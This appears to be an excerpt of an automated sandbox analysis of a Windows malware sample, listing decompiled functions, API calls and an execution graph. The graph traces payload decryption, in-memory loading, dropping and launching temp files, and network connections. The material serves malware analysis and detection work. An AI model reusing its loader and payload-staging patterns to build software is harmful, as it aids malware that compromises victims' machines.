                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastLocalReleaseTimelstrcat
                                                                                                                                                                                                                                                                          • String ID: .kz
                                                                                                                                                                                                                                                                          • API String ID: 2740484991-4216035510
                                                                                                                                                                                                                                                                          • Opcode ID: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                          • Instruction ID: bb0d42d70b93f9fb2e2ab601979b3322a165a8cda29c6817b22e5740edda4972
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28f090440165364d74cfd4a48749ec745bc8846a55d0f1667de3e46dcaf07841
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D310AB1E00209EBEF08DF94C885BEEB7B5EF58304F10C159E515B7281E678AA85CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 10002468
                                                                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 100024B2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.607930216.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10001000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 544645111-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                          • Instruction ID: 1bc0fa0ef2482510480b6d00c0adc5d74525c4f8bff966f143e9313f40c37061
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af73fc3a835f5cb9a27c40e94a700fe6bd6fe7a21d246ca72f0d591094e94dd8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21DEB0905249EFEF14CF94C984BAEBBB5FF44384F208599D909A7248C774AF80DB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                                                                          			E040078D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 >= _a8) {
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					while(_v16 < _a8) {
                                                                                                                                                                                                                                                                          						_t31 = E04007B70( &_v12, _v16 * 6 + _a4, 4);
                                                                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                                                                          						L0400B1EC();
                                                                                                                                                                                                                                                                          						_v20 = _t31;
                                                                                                                                                                                                                                                                          						wnsprintfA(_v16 * 0x28 + _a12, 0x28, "%s:%u", _v20,  *(_a4 + 4 + _v16 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                          						_t46 = _t46 + 0x20;
                                                                                                                                                                                                                                                                          						_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v5 = 1;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x040078d6
                                                                                                                                                                                                                                                                          0x040078de
                                                                                                                                                                                                                                                                          0x040078f8
                                                                                                                                                                                                                                                                          0x0400790a
                                                                                                                                                                                                                                                                          0x04007922
                                                                                                                                                                                                                                                                          0x0400792d
                                                                                                                                                                                                                                                                          0x0400792e
                                                                                                                                                                                                                                                                          0x04007933
                                                                                                                                                                                                                                                                          0x0400795a
                                                                                                                                                                                                                                                                          0x04007960
                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                          0x04007907
                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                          0x04007965
                                                                                                                                                                                                                                                                          0x0400796f

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: inet_ntoawnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s:%u
                                                                                                                                                                                                                                                                          • API String ID: 890441721-1474915593
                                                                                                                                                                                                                                                                          • Opcode ID: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                          • Instruction ID: 46ead0e7315176c8e7c3a96679b7c8ac73bfa04a13e8ca702a559205f2d732b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45e21c9532a10fe3660936149e330ed9fd96ba08dfcacbd0c7ca049c9e07423d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05115B71A04208ABEB08CF94C995BEDBBB4EB50308F04C29DE915BB280D379F645CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                          					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                          					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                          						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                          						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                          0x04001e66
                                                                                                                                                                                                                                                                          0x04001e71
                                                                                                                                                                                                                                                                          0x04001e8b
                                                                                                                                                                                                                                                                          0x04001e93
                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                          0x04001ec2
                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                          0x04001ed4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04001EB4
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04001EC2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                          • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                          • Opcode ID: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                          • Instruction ID: 8c18c5092416b0968d1e58d42d3dcefe862203e4accbbf984a8d418911b9581a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C011275A4420CABEB10DF90DD45FEE77B9AB04704F148119E6087B2C0D775AA45C7A1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4020351045-0
                                                                                                                                                                                                                                                                          • Opcode ID: 711738e446fe3b7edafeffa79fbdd3347046ec6280da55ba19de0ab90e35ac8b
                                                                                                                                                                                                                                                                          • Instruction ID: 24174dcb29c75eb10321d4f28545725da20b22b3dd9ddbd94471567b296ec203
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 711738e446fe3b7edafeffa79fbdd3347046ec6280da55ba19de0ab90e35ac8b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D011B703042069BCB00EF75DA8892FB7E5BB54308754847E9848B73C1E6BCD980DB99
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,004023C1,?,?,?,?,?,00401C54), ref: 0040224B
                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,004023C1,?,?,?,?,?,00401C54), ref: 00402261
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,004023C1,?,?,?,?,?,00401C54), ref: 00402269
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,004023C1,?,?,?,?,?,00401C54), ref: 0040228C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 682475483-0
                                                                                                                                                                                                                                                                          • Opcode ID: b0d1a973718a68e77ae23a23f47d086d7b5acdbac98e9d8a1e001a8f832c1e7e
                                                                                                                                                                                                                                                                          • Instruction ID: d59e870dec7d302afa92fc910524551bdf3aec598eae15ddc7b5345af43b2dbe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d1a973718a68e77ae23a23f47d086d7b5acdbac98e9d8a1e001a8f832c1e7e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0AD716046109BCF10BFE59A89A9F77E8EE04318B0000BEE840B32C1E3B899048AED
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:28.5%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:99.6%
                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                          Total number of Nodes:1330
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:25
                                                                                                                                                                                                                                                                          execution_graph 4796 4008e80 4797 4008e99 lstrcpyA 4796->4797 4798 4008f15 4796->4798 4803 4007b70 4797->4803 4801 4008f4c Sleep 4802 4008ed4 4801->4802 4802->4798 4802->4801 4804 4007b7b SetEvent 4803->4804 4804->4802 4805 4004880 4806 400488f 4805->4806 4807 4004a9f CryptReleaseContext 4806->4807 4809 40048be CryptCreateHash 4806->4809 4808 4004aab 4807->4808 4810 4004a90 4809->4810 4811 40048f9 CryptHashData 4809->4811 4810->4807 4812 4004a83 CryptDestroyHash 4811->4812 4813 4004919 CryptDeriveKey 4811->4813 4812->4810 4813->4812 4814 400494a CryptDecrypt CryptDestroyKey 4813->4814 4814->4812 4815 4004995 CryptCreateHash 4814->4815 4815->4812 4816 40049b7 CryptHashData 4815->4816 4817 4004a76 CryptDestroyHash 4816->4817 4818 40049da CryptGetHashParam 4816->4818 4817->4812 4818->4817 4819 4004a11 CryptGetHashParam 4818->4819 4819->4817 4820 4004a3e 4819->4820 4820->4817 4821 4002900 4822 4002ae5 4821->4822 4823 400291a 4821->4823 4823->4822 4824 400292e InternetOpenA 4823->4824 4824->4822 4825 400294f InternetConnectA 4824->4825 4826 4002adb InternetCloseHandle 4825->4826 4827 400297f HttpOpenRequestA 4825->4827 4826->4822 4828 40029b0 wsprintfA InternetQueryOptionA InternetSetOptionA lstrlenA HttpSendRequestA 4827->4828 4829 4002ad1 InternetCloseHandle 4827->4829 4830 4002a35 4828->4830 4831 4002aaf GetLastError 4828->4831 4829->4826 4833 4002a82 4830->4833 4834 4002a4a InternetReadFile 4830->4834 4832 4002ac7 InternetCloseHandle 4831->4832 4832->4829 4833->4832 4834->4830 4834->4833 5127 4006444 5128 400644d 5127->5128 5129 400647b 5128->5129 5130 40064ba GetEnvironmentVariableA 5128->5130 5132 40065f3 5128->5132 5131 40064e1 5130->5131 5134 4009730 QueryPerformanceCounter 5131->5134 5133 4007250 7 API calls 5132->5133 5195 4006bbd 5132->5195 5135 4006638 5133->5135 5137 40064f2 GetTickCount GetTempFileNameA CreateFileA 5134->5137 5139 4006752 5135->5139 5140 4006654 VirtualAlloc 5135->5140 5136 400a360 3 API calls 5136->5129 5137->5132 5138 4006552 WriteFile 5137->5138 5141 4006588 5138->5141 5142 40065dd 5138->5142 5146 40069ba GetEnvironmentVariableA 5139->5146 5147 4006858 5139->5147 5148 400678e VirtualAlloc 5139->5148 5140->5139 5144 400667a 5140->5144 5141->5142 5143 4006593 CloseHandle 5141->5143 5142->5132 5145 40065e6 CloseHandle 5142->5145 5149 4006c60 4 API calls 5143->5149 5196 40097a0 GetProcessHeap RtlAllocateHeap 5144->5196 5145->5132 5150 40069e1 5146->5150 5152 4002070 32 API calls 5147->5152 5153 40067c6 5148->5153 5157 4006856 5148->5157 5151 40065ab 5149->5151 5155 4009730 QueryPerformanceCounter 5150->5155 5154 4001e60 2 API calls 5151->5154 5152->5157 5163 4006842 VirtualFree 5153->5163 5169 4002070 32 API calls 5153->5169 5159 40065b7 5154->5159 5160 40069f2 GetTickCount GetTempFileNameA CreateFileA 5155->5160 5158 40069a6 5157->5158 5162 4006891 5157->5162 5167 40073c0 5 API calls 5157->5167 5158->5146 5164 40065d8 5159->5164 5165 40065c9 5159->5165 5166 4006a4f 5160->5166 5160->5195 5161 4006698 CreateThread CloseHandle 5161->5139 5168 400698a 5162->5168 5197 40097a0 GetProcessHeap RtlAllocateHeap 5162->5197 5163->5157 5171 4006cf0 4 API calls 5164->5171 5170 40074a0 30 API calls 5165->5170 5172 4006a7b VirtualAlloc 5166->5172 5173 4006b1e WriteFile 5166->5173 5167->5162 5168->5158 5179 4002510 8 API calls 5168->5179 5176 40067f5 5169->5176 5177 40065ce ExitProcess 5170->5177 5171->5142 5174 4006b1c 5172->5174 5178 4006aaf 5172->5178 5173->5174 5180 4006bc9 CloseHandle 5174->5180 5183 4006b59 CloseHandle 5174->5183 5176->5163 5182 4006809 VirtualAlloc 5176->5182 5186 4006ad2 WriteFile 5178->5186 5187 4006b08 VirtualFree 5178->5187 5179->5158 5180->5195 5181 40068aa 5184 40068e9 VirtualAlloc 5181->5184 5189 40068ca 5181->5189 5185 400683f 5182->5185 5188 4001e60 2 API calls 5183->5188 5184->5189 5185->5163 5186->5187 5187->5174 5190 4006b72 5188->5190 5189->5168 5191 400693f CreateThread CloseHandle 5189->5191 5192 4006b9e 5190->5192 5193 40073c0 5 API calls 5190->5193 5190->5195 5191->5168 5198 40077b0 49 API calls 5191->5198 5194 4002510 8 API calls 5192->5194 5192->5195 5193->5192 5194->5195 5195->5129 5195->5136 5196->5161 5197->5181 4835 4006305 4838 400630e 4835->4838 4836 400633c 4837 400640e 4837->4836 4839 40064ba GetEnvironmentVariableA 4837->4839 4840 40065f3 4837->4840 4838->4836 4838->4837 4841 4006410 4838->4841 4842 40063a4 VirtualAlloc 4838->4842 4843 40064e1 4839->4843 4845 4007250 7 API calls 4840->4845 4910 4006bbd 4840->4910 4844 4001ee0 2 API calls 4841->4844 4842->4837 4850 40063cc 4842->4850 4846 4009730 QueryPerformanceCounter 4843->4846 4844->4837 4847 4006638 4845->4847 4849 40064f2 GetTickCount GetTempFileNameA CreateFileA 4846->4849 4853 4006752 4847->4853 4854 4006654 VirtualAlloc 4847->4854 4848 400a360 3 API calls 4848->4836 4849->4840 4852 4006552 WriteFile 4849->4852 4851 40063fd VirtualFree 4850->4851 4855 4001ee0 2 API calls 4850->4855 4851->4837 4856 4006588 4852->4856 4857 40065dd 4852->4857 4862 40069ba GetEnvironmentVariableA 4853->4862 4863 4006858 4853->4863 4864 400678e VirtualAlloc 4853->4864 4854->4853 4859 400667a 4854->4859 4860 40063f4 4855->4860 4856->4857 4858 4006593 CloseHandle 4856->4858 4857->4840 4861 40065e6 CloseHandle 4857->4861 4865 4006c60 4 API calls 4858->4865 4912 40097a0 GetProcessHeap RtlAllocateHeap 4859->4912 4860->4851 4861->4840 4866 40069e1 4862->4866 4868 4002070 32 API calls 4863->4868 4876 4006856 4864->4876 4879 40067c6 4864->4879 4867 40065ab 4865->4867 4870 4009730 QueryPerformanceCounter 4866->4870 4869 4001e60 2 API calls 4867->4869 4868->4876 4873 40065b7 4869->4873 4874 40069f2 GetTickCount GetTempFileNameA CreateFileA 4870->4874 4872 40069a6 4872->4862 4880 40065d8 4873->4880 4881 40065c9 4873->4881 4882 4006a4f 4874->4882 4874->4910 4875 4006698 CreateThread CloseHandle 4875->4853 4876->4872 4877 4006891 4876->4877 4883 40073c0 5 API calls 4876->4883 4884 400698a 4877->4884 4913 40097a0 GetProcessHeap RtlAllocateHeap 4877->4913 4878 4006842 VirtualFree 4878->4876 4879->4878 4885 4002070 32 API calls 4879->4885 4887 4006cf0 4 API calls 4880->4887 4886 40074a0 30 API calls 4881->4886 4888 4006a7b VirtualAlloc 4882->4888 4889 4006b1e WriteFile 4882->4889 4883->4877 4884->4872 4895 4002510 8 API calls 4884->4895 4892 40067f5 4885->4892 4893 40065ce ExitProcess 4886->4893 4887->4857 4890 4006b1c 4888->4890 4894 4006aaf 4888->4894 4889->4890 4896 4006bc9 CloseHandle 4890->4896 4899 4006b59 CloseHandle 4890->4899 4892->4878 4898 4006809 VirtualAlloc 4892->4898 4902 4006ad2 WriteFile 4894->4902 4903 4006b08 VirtualFree 4894->4903 4895->4872 4896->4910 4897 40068aa 4900 40068e9 VirtualAlloc 4897->4900 4905 40068ca 4897->4905 4901 400683f 4898->4901 4904 4001e60 2 API calls 4899->4904 4900->4905 4901->4878 4902->4903 4903->4890 4906 4006b72 4904->4906 4905->4884 4907 400693f CreateThread CloseHandle 4905->4907 4908 4006b9e 4906->4908 4909 40073c0 5 API calls 4906->4909 4906->4910 4907->4884 4914 40077b0 49 API calls 4907->4914 4908->4910 4911 4002510 8 API calls 4908->4911 4909->4908 4910->4836 4910->4848 4911->4910 4912->4875 4913->4897 4915 400a090 socket 4916 400a0b2 htons gethostbyname 4915->4916 4922 400a0aa 4915->4922 4917 400a0db 4916->4917 4916->4922 4918 400a12a 4917->4918 4919 400a117 connect 4917->4919 4920 400a148 4918->4920 4921 400a13a closesocket 4918->4921 4919->4917 4919->4918 4920->4922 4923 400a14e setsockopt setsockopt 4920->4923 4921->4922 4923->4922 4924 4002890 4925 40028a0 InternetOpenA 4924->4925 4926 4002899 4924->4926 4926->4925 4927 4002090 4928 40020b0 32 API calls 4927->4928 4929 40020a2 4928->4929 4930 10001890 FreeLibrary 5199 4003450 5200 4003494 VirtualFree 5199->5200 5201 40034a7 5200->5201 5202 40028d0 5203 40028e1 InternetCloseHandle 5202->5203 5204 40028f1 5202->5204 5203->5204 4931 4004096 4932 400409f 4931->4932 4933 40040ab EnterCriticalSection 4932->4933 4934 40042cd DeleteCriticalSection 4932->4934 4936 40040da 4933->4936 4937 40040bb VirtualFree 4933->4937 4935 40042d7 4934->4935 4938 40040e0 TerminateThread 4936->4938 4939 40040f3 ResetEvent LeaveCriticalSection CreateThread 4936->4939 4937->4936 4938->4939 4952 40097a0 GetProcessHeap RtlAllocateHeap 4939->4952 4954 4004ac0 164 API calls 4939->4954 4941 400413a 4942 4004221 WaitForMultipleObjects WaitForSingleObject 4941->4942 4950 40041d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 4941->4950 4943 400424b 4942->4943 4944 400424f WaitForSingleObject 4942->4944 4943->4944 4945 4004273 EnterCriticalSection 4944->4945 4946 4004267 TerminateThread 4944->4946 4947 40042a2 LeaveCriticalSection 4945->4947 4948 4004283 VirtualFree 4945->4948 4946->4945 4949 40097c0 2 API calls 4947->4949 4948->4947 4951 40042bb 4949->4951 4950->4941 4953 4004ba0 74 API calls 4950->4953 4951->4934 4952->4941 5205 40065d6 5206 40065dd 5205->5206 5207 40065e6 CloseHandle 5206->5207 5208 40065f3 5206->5208 5207->5208 5209 4007250 7 API calls 5208->5209 5255 4006bbd 5208->5255 5210 4006638 5209->5210 5213 4006752 5210->5213 5214 4006654 VirtualAlloc 5210->5214 5211 400a360 3 API calls 5212 4006c13 5211->5212 5216 40069ba GetEnvironmentVariableA 5213->5216 5217 4006858 5213->5217 5218 400678e VirtualAlloc 5213->5218 5214->5213 5215 400667a 5214->5215 5257 40097a0 GetProcessHeap RtlAllocateHeap 5215->5257 5219 40069e1 5216->5219 5220 4002070 32 API calls 5217->5220 5226 4006856 5218->5226 5229 40067c6 5218->5229 5221 4009730 QueryPerformanceCounter 5219->5221 5220->5226 5224 40069f2 GetTickCount GetTempFileNameA CreateFileA 5221->5224 5223 40069a6 5223->5216 5230 4006a4f 5224->5230 5224->5255 5225 4006698 CreateThread CloseHandle 5225->5213 5226->5223 5227 4006891 5226->5227 5231 40073c0 5 API calls 5226->5231 5232 400698a 5227->5232 5258 40097a0 GetProcessHeap RtlAllocateHeap 5227->5258 5228 4006842 VirtualFree 5228->5226 5229->5228 5233 4002070 32 API calls 5229->5233 5234 4006a7b VirtualAlloc 5230->5234 5235 4006b1e WriteFile 5230->5235 5231->5227 5232->5223 5240 4002510 8 API calls 5232->5240 5238 40067f5 5233->5238 5236 4006b1c 5234->5236 5239 4006aaf 5234->5239 5235->5236 5241 4006bc9 CloseHandle 5236->5241 5244 4006b59 CloseHandle 5236->5244 5238->5228 5243 4006809 VirtualAlloc 5238->5243 5247 4006ad2 WriteFile 5239->5247 5248 4006b08 VirtualFree 5239->5248 5240->5223 5241->5255 5242 40068aa 5245 40068e9 VirtualAlloc 5242->5245 5250 40068ca 5242->5250 5246 400683f 5243->5246 5249 4001e60 2 API calls 5244->5249 5245->5250 5246->5228 5247->5248 5248->5236 5251 4006b72 5249->5251 5250->5232 5252 400693f CreateThread CloseHandle 5250->5252 5253 4006b9e 5251->5253 5254 40073c0 5 API calls 5251->5254 5251->5255 5252->5232 5259 40077b0 49 API calls 5252->5259 5253->5255 5256 4002510 8 API calls 5253->5256 5254->5253 5255->5211 5255->5212 5256->5255 5257->5225 5258->5242 4955 4008f1e 4956 4008f4c Sleep 4955->4956 4957 4008ed4 4956->4957 4957->4956 4958 4008f15 4957->4958 3902 10002720 3905 10001000 3902->3905 3908 10001030 LoadLibraryW GetProcAddress 3905->3908 3948 10001b30 3908->3948 3911 10001091 SetLastError 3944 1000102b 3911->3944 3912 100010a3 3913 10001b30 SetLastError 3912->3913 3914 100010b9 3913->3914 3915 100010f0 3914->3915 3916 100010de SetLastError 3914->3916 3914->3944 3917 10001111 3915->3917 3918 100010ff SetLastError 3915->3918 3916->3944 3919 1000111c SetLastError 3917->3919 3921 1000112e GetNativeSystemInfo 3917->3921 3918->3944 3919->3944 3922 100011bc 3921->3922 3923 100011d7 SetLastError 3922->3923 3924 100011e9 3922->3924 3923->3944 3951 10001800 VirtualAlloc 3924->3951 3925 10001202 3926 1000123d GetProcessHeap RtlAllocateHeap 3925->3926 3929 1000122e SetLastError 3925->3929 3927 10001257 SetLastError 3926->3927 3928 1000127b 3926->3928 3927->3944 3931 10001b30 SetLastError 3928->3931 3929->3944 3932 100012fb 3931->3932 3933 10001302 3932->3933 3952 10001800 VirtualAlloc 3932->3952 4023 100016c0 3933->4023 3934 10001320 3953 10001b50 3934->3953 3937 1000136b 3937->3933 3959 100021a0 3937->3959 3941 100013ca 3941->3933 3942 100013eb 3941->3942 3943 100013ff GetPEB 3942->3943 3942->3944 3980 4003b00 3943->3980 3949 10001070 3948->3949 3950 10001b3b SetLastError 3948->3950 3949->3911 3949->3912 3949->3944 3950->3949 3951->3925 3952->3934 3956 10001b7d 3953->3956 3954 10001b30 SetLastError 3955 10001c32 3954->3955 3957 10001be9 3955->3957 4031 10001800 VirtualAlloc 3955->4031 3956->3954 3956->3957 3957->3937 3960 100021dd IsBadHugeReadPtr 3959->3960 3970 100013b5 3959->3970 3962 10002207 3960->3962 3960->3970 3962->3970 4032 10001840 LoadLibraryA 3962->4032 3964 10002239 SetLastError 3964->3970 3965 1000224d 4034 10001a20 3965->4034 3968 10002273 SetLastError 3968->3970 3970->3933 3974 10001e80 3970->3974 3971 1000229d 3971->3970 3972 100023ae SetLastError 3971->3972 3972->3970 3977 10001eba 3974->3977 3975 10001fe5 3976 10001d10 2 API calls 3975->3976 3979 10001fc1 